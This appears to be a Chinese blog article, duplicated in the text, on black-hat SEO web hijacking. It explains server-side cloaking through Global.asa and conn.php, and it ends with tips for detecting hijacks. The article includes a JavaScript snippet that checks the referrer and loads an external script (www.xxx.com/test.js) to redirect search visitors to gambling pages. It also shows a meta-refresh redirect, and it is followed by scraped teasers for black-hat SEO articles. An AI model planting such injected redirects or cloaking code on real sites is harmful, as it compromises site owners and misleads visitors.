黑帽SEO-网页劫持

网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。

服务端劫持

服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。

asp/aspx/php劫持

Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。

客户端劫持

客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。

js劫持

js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。

js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。

js劫持案例

效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面;直接输入网址访问网页,跳转到404页面。

代码:

today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write (‘<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>‘); } else { window.location.href="../../404.htm"; }

  

分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。

header劫持

在源代码中写入以下代码:

<meta http-equiv=“refresh“ content=“10; url=http://www.xksafe.com“>

  

利用的就是Meta Refresh Tag(自动转向),将流量引走。

手法对比

客户端劫持与服务端区别

客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。

服务端劫持:改变了每次访问网页从服务端获取到的网页代码。

客户端劫持与服务端判断方法

客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。

服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。

结语: 网页劫持的方法还有很多,我了解的大概只是皮毛,黑帽SEO技术的水很深,前路漫漫。

网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。

服务端劫持

服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。

asp/aspx/php劫持

Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。

客户端劫持

客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。

js劫持

js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。

js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。

js劫持案例

效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面;直接输入网址访问网页,跳转到404页面。

代码:

today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write (‘<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>‘); } else { window.location.href="../../404.htm"; }

  

分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。

header劫持

在源代码中写入以下代码:

<meta http-equiv=“refresh“ content=“10; url=http://www.xksafe.com“>

  

利用的就是Meta Refresh Tag(自动转向),将流量引走。

手法对比

客户端劫持与服务端区别

客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。

服务端劫持:改变了每次访问网页从服务端获取到的网页代码。

客户端劫持与服务端判断方法

客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。

服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。

时间: 2024-10-27 03:47:09

黑帽SEO-网页劫持的相关文章

独家揭秘:暴利的黑帽SEO行业

导读:这篇文章如果加一个气势磅礴的开头就完美了,这么好的文章却不适合在行业大站上发布,可惜了,作者黑帽客雅皮士向大家普及了当今SEO行业的灰色地带:黑客与黑帽SEO,让大家了解不为人知的SEO另一面. 自从有了白帽seo,就有了黑帽seo.黑白帽的临界点没有标准,就像好人和坏人没有评判的标准. 快 速排名快速暴利是黑帽seo的帮规教义,不能达到快速排名的技术不用,不能快速暴利的项目不做.现在许多人对黑帽手法的认知还停留在几年之前--关键词堆 积.斗蓬法.隐型文本和链接.桥页.跳转等上,殊不知黑帽

浅析10种常见的黑帽seo手法

虽然博主并不认同黑帽seo手法,但是一些常见的黑帽手法还是需要了解的,增加自己对黑帽的认知,也可以在自己优化网站时适时的规避开这些黑帽手法,从而避免自己的网站被搜索引擎惩罚.好了,话不多说,下面进入今天的主题:10种常见的黑帽手法详解. 1.关键词堆积 这是老生常谈的问题,最常见的一种黑帽seo手法.在网站的内容中,我们讲究的是自然出现关键词,没必要出现时就不要出现,而有些人单纯的为了提升关键词的"密度"在文章中刻意并大量出现关键词,其引出的后果是语句不通顺,严重影响用户的阅读体验,导

黑帽SEO作弊的10大关键手法

黑帽SEO作弊的10大关键手法 我今天分享黑帽SEO的作弊方法,不是让大家去学习怎么做黑帽SEO,而是能够让大家知道什么样的手法是黑帽,知道了我们就可以去避免发生这种情况,下面我会详细的说下常用的黑帽SEO手法. 1.利用高权重网站 大家都知道高权重的网站对于我们站点排名的影响是很大的,那么很多黑帽SEO就会利用这些高权重的网站去做链接,大批量的去做,完全的.单一的关键 词指向.他们的目的就是利用这些高权重网站导出的链接并传递权重,迅速的提升某关键词的排名,当然这样肯定不会长久,但也许这些人就是

黑帽SEO手法

黑帽SEO手法 0x00:概念 SEO全称搜索引擎优化,通过站内优化和站内优化方式来提升搜索引擎排名,有白帽SEO和黑帽SEO. 因为正规的SEO优化需要很长时间,黑帽SEO手法让站内快速提升排名的有: 黑链(暗链) 站群 网站劫持(搜索引擎劫持) 桥页 0x01:SEO的一些黑色手法 常见的SEO手法: 利用泛解析做站群 入侵高权重网站挂暗链 入侵高权重网站做网页劫持 篡改高权重网站网页内容 利用高权重网站二级目录做推广页面 修改nginx配置做目录反向代理 1.利用泛解析建立泛二级域名站群

快速排名 让人疯狂的黑帽seo技术

对于黑帽seo大家或许并不陌生,黑帽seo和白帽seo恰恰相反,是作弊手段.有白帽seo的时候,就有了黑帽seo一直到现在.但隔行如隔山这句话这句话一点都没错,再没接触黑帽seo技术之前我根本不知道黑帽seo能这么快的排名.今天我就解密下7天快速排名的方法,同时感谢来自"黑帽技术网"的技术解答我的问题,据了解,百分之九十的黑帽技术来自它,拥有独家的黑帽技术代码及视频教程. 黑帽seo技术之权重转移: 如图片所示,相信大家也看过一个新站权重5的站,在此之前,笔者一直疑惑,其实这就是黑帽中

黑帽SEO学习网

黑帽学习网是一个学习黑帽SEO技术的内部论坛,分享黑帽seo基础知识,黑帽SEO中高级实战技术:包括专业术语,实战经验,还有建站基础,从建立网站开始到seo优化整个流程的一些细节知识.由白帽黑帽SEO专家落月Q935432468主导,独创“黑帽SEO技术”SEO站群操作流程系统.关键词加法.减法原理.大型蜘蛛池外推,原创批量文章技术(易收录.秒收).泛目录.无限生成.无限收录站群数据分析技术. 黑帽SEO学习网目录 1.黑帽SEO学习网分类 ?黑帽SEO理论 ?黑帽seo实战 ?电子商务 ?网站

2019年逆冬黑帽seo

快排原理.点击软件开发.快照劫持.镜像(克隆)泛目录排名. https://www.zygx8.com/thread-11569-1-1.html 1.黑帽SEO常识讲解.mp4 2.老域名选择(从年龄.外链.历史)[聚名网选择].mp4 3.网站服务器配置(Centos)[安装宝塔LINUX].mp4 4.宝塔使用技巧及网站程序安装[基于Z-BLOG].mp4 5.白帽实战误区扫盲.mp4 6.网站程序比较(dedecms,zblog,wordpress).mp4 7.单站排名思路及实战操作[

合理的关键字密度散布与黑帽SEO之躲藏文本

咱们都晓得,关于baidu的关键字排行有一个很重要的条件即是关键字密度,在咱们的了解中关键字的密度在2%-8%这个规模之内.咱们想为啥在这个规模之内呢?韶关查找引擎优化今日就跟咱们讨论一下这个关键字密度和用黑帽SEO躲藏文本方面来堆砌关键字取得排行. 网站关键字密度剖析 关于一个正常的网站,他的主页是会有十分多的文字.这儿的文字的字数就可以作为这个网站的总字数,而关键字密度即是用关键字的字数除以总字数来得到.这样2%密度就应该是一个正常网站在没有通过优化的情况下的合理密度,通常都不会超越2%这个

黑帽SEO之暗链

暗链也称为 黑链 ,即隐蔽链接 hidden links,是黑帽SEO的作弊手法之一.在早期的SEO优化中,黑链是最有效最迅速的方法之一:但是现在百度算法已经对iframe和display:none 等直接进行了打击,如果你对代码没有任何处理的话,那么你所做的外链将全部降权.因此,目前黑帽SEO技术中,暗链已经用得不多,但还是有必要了解下这个经典的作弊手法. 挂暗链的目的很简单,增加网站外链,提高网站排名:实现方式主要分为几种:利用CSS实现.利用JS实现.利用DIV+JS实现,其他高级手法.